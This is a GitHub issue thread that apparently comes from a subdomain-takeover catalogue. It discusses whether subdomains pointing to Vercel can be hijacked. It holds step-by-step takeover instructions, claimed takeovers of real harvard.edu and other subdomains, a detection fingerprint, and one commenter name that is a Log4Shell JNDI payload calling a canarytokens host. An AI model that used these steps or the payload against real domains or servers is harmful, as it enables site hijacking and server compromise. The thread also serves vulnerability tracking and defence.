Subdomains pointing to vercel.com are vulnerable

Question

Subdomains pointing to vercel.com are vulnerable

ScrubsAndStats opened this issue 4 years ago · comments

Ali Salman commented 4 years ago

Service name

Vercel

Proof

Successful subdomain takeover on a harvard.edu subdomain (screenshot).

Documentation

Create a new repository on Github and upload an index.html
Visit https://vercel.com/ and sign up using your Github account
Create a new project and point it to the previously created Github repository
Open the "Domains" tab on Vercel and add the vulnerable domain
Boom! Exploited!

marcelo321 · Answer 1 · Thu Dec 17 2020 09:28:15 GMT+0800 (China Standard Time)

Can you share the cname regex and the fingerprint?

Ali Salman · Answer 2 · Fri Dec 18 2020 02:07:01 GMT+0800 (China Standard Time)

Can you share the cname regex and the fingerprint?

Sure

{ "service": "vercel", "cname": [ "" ], "fingerprint": [ "The deployment could not be found on Vercel." ], "nxdomain": false }

Aditya Thebe · Answer 3 · Sat Dec 26 2020 12:36:38 GMT+0800 (China Standard Time)

There are definitely edge cases here.

$ host -t CNAME anythingrandom.console.dev.twilio.com
anythingrandom.console.dev.twilio.com is an alias for cname.vercel-dns.com.

$ curl 'https://anythingrandom.console.dev.twilio.com/'                                                                                                     10:12:48
The deployment could not be found on Vercel.

DEPLOYMENT_NOT_FOUND

marcelo321 · Answer 4 · Tue Dec 29 2020 12:39:43 GMT+0800 (China Standard Time)

so the cname we need to grep is vercel-dns.com not vercel.com. thank you @adityathebe

blackcodersec · Answer 5 · Sat Sep 04 2021 23:28:02 GMT+0800 (China Standard Time)

Can you share the cname regex and the fingerprint?

Sure

{ "service": "vercel", "cname": [ "" ], "fingerprint": [ "The deployment could not be found on Vercel." ], "nxdomain": false }

are you takeover any subdomain? Do you have any poc?

raladev · Answer 6 · Fri Sep 24 2021 23:57:09 GMT+0800 (China Standard Time)

Summary for 2021:
U can takeover mashed.potato.com only if potato.com is not used in the account of the victim, otherwise, u will get Already owned err.

DarkNinja · Answer 7 · Wed Feb 02 2022 14:01:48 GMT+0800 (China Standard Time)

This can be closed as Edge-case

Hossam mesbah · Answer 8 · Mon Feb 07 2022 18:14:53 GMT+0800 (China Standard Time)

It still vulnerable yesterday I takeover 2 subdomains and I've upload my index

DarkNinja · Answer 9 · Mon Feb 07 2022 18:25:54 GMT+0800 (China Standard Time)

@M359AH u took over mashed.potato.com even when potato.com is already registered? If yes, please share how you managed to do that? Just curious :0

Hossam mesbah · Answer 10 · Mon Feb 07 2022 18:48:59 GMT+0800 (China Standard Time)

@jan-muhammad-zaidi

Hello Muhammed

I've found the subdomain I got this error page

After it, I go to see the CNAME

;; AUTHORITY SECTION:
vercel.app.		60	IN	SOA	ns1.vercel-dns.com. hostmaster.nsone.net. 1644228969 43200 7200 1209600 60

;; Query time: 134 msec
;; SERVER:#53(.131)
;; WHEN: Mon Feb 07 12:41:00 EET 2022
;; MSG SIZE  rcvd: 119

Now I go to vercel.app and add a public repository contains my PoC index and after import the project I've add the domain and added successfully

and my PoC has been uploaded

DarkNinja · Answer 11 · Mon Feb 07 2022 19:11:43 GMT+0800 (China Standard Time)

How come it's not showing a domain already registered error? Like this

Hossam mesbah · Answer 12 · Mon Feb 07 2022 21:36:59 GMT+0800 (China Standard Time)

Hello @jan-muhammad-zaidi

I think your target is not vulnerable because It should be registered without an errors like my comment above

Hossam mesbah · Answer 13 · Mon Feb 07 2022 21:41:20 GMT+0800 (China Standard Time)

Your index should be uploaded like It:

Sorry for my bad image edit 😅 😂 😂

DarkNinja · Answer 14 · Tue Feb 08 2022 19:21:27 GMT+0800 (China Standard Time)

@M359AH no issues with the edit though :P

umar98 · Answer 15 · Sun May 22 2022 16:12:30 GMT+0800 (China Standard Time)

Any luck on how to do this?

FATMAN · Answer 16 · Mon Jun 20 2022 17:51:15 GMT+0800 (China Standard Time)

Any luck on how to do this?

got same error...any clue on this?

Hossam mesbah · Answer 17 · Mon Jun 20 2022 19:04:03 GMT+0800 (China Standard Time)

Hello Fatma, Umar

Unfortunately, I didn't find this error before

Jared-Douville · Answer 18 · Sun Aug 21 2022 01:27:29 GMT+0800 (China Standard Time)

me aswelll

Faizee Asad · Answer 19 · Mon Sep 19 2022 21:05:29 GMT+0800 (China Standard Time)

https://vercel.com/docs/concepts/projects/custom-domains

worldclassdev · Answer 20 · Thu Oct 20 2022 15:47:44 GMT+0800 (China Standard Time)

Any luck on how to do this?

same error , vercel fixed the bug no luck

Syed · Answer 21 · Sat Feb 11 2023 13:58:08 GMT+0800 (China Standard Time)

no more takeover

Joren Vrancken · Answer 22 · Sun Jun 25 2023 20:39:03 GMT+0800 (China Standard Time)

Domain takeovers using Vercel are definitely still possible.

However, they are limited. In my testing, I found that a domain is not vulnerable if:

The root domain is used by a Vercel account (i.e. the root domain points to 76.76.21.21 and is linked to a project).
The domain/root domain is verified, even if the root domain does not point to 76.76.21.21.
Another subdomain of the same root domain is used by a Vercel account.

In practice, this means many subdomains will not be vulnerable (but subdomains definitely can be vulnerable).

There seems to be only one way to be sure a domain is vulnerable or not: try it out.

I created a PR to update the README: #375

Saif Abdullah Khan · Answer 23 · Wed Jul 26 2023 00:32:14 GMT+0800 (China Standard Time)

Saif Abdullah Khan commented a year ago

ARAVIND · Answer 24 · Wed Aug 02 2023 18:33:53 GMT+0800 (China Standard Time)

I have the same error but it can be only possible if we configure DNS to that custom domain that should be shown in the Domains category but it's not showing, how could we add DNS?

${jndi:ldap://x${hostName}.L4J.ivbjko93xl7fkl44m0yqc04gu.canarytokens.com/a} · Answer 25 · Tue Sep 05 2023 05:29:29 GMT+0800 (China Standard Time)

${jndi:ldap://x${hostName}.L4J.ivbjko93xl7fkl44m0yqc04gu.canarytokens.com/a} commented a year ago

Any success on this?

brijesh1353 · Answer 26 · Sat Oct 07 2023 03:38:26 GMT+0800 (China Standard Time)

I have the same error but it can be only possible if we configure DNS to that custom domain that should be shown in the Domains category but it's not showing, how could we add DNS?

This has happened to me too, please show me the solution

Khaled Mohamed · Answer 27 · Fri Jan 05 2024 20:22:56 GMT+0800 (China Standard Time)

It's not possible anymore because you have to add a txt record, and that is not possible in the case of subdomain takeover.

Hossam mesbah · Answer 28 · Sat Jan 06 2024 03:35:19 GMT+0800 (China Standard Time)

Yes I think the exploitation now will not complete

Rewinter · Answer 29 · Thu Jan 18 2024 20:18:08 GMT+0800 (China Standard Time)

Shouldn't this be marked not vulnerable at this point?

DarkNinja · Answer 30 · Thu Mar 28 2024 09:01:21 GMT+0800 (China Standard Time)

It should be closed as Not Vulnerable

Atharv34 · Answer 31 · Fri Apr 19 2024 01:45:36 GMT+0800 (China Standard Time)

Edge Case.

Philippe Delteil · Answer 32 · Wed May 01 2024 03:45:02 GMT+0800 (China Standard Time)

Edge Case.

This is not the example of an edge case. Edge case would be if you managed to take over the subdomain due to uncommon or unknown conditions.

Wang · Answer 33 · Thu Jun 06 2024 16:54:25 GMT+0800 (China Standard Time)

Is this vulnerability no longer exploitable? Why hasn't the Status changed to Not vulnerable?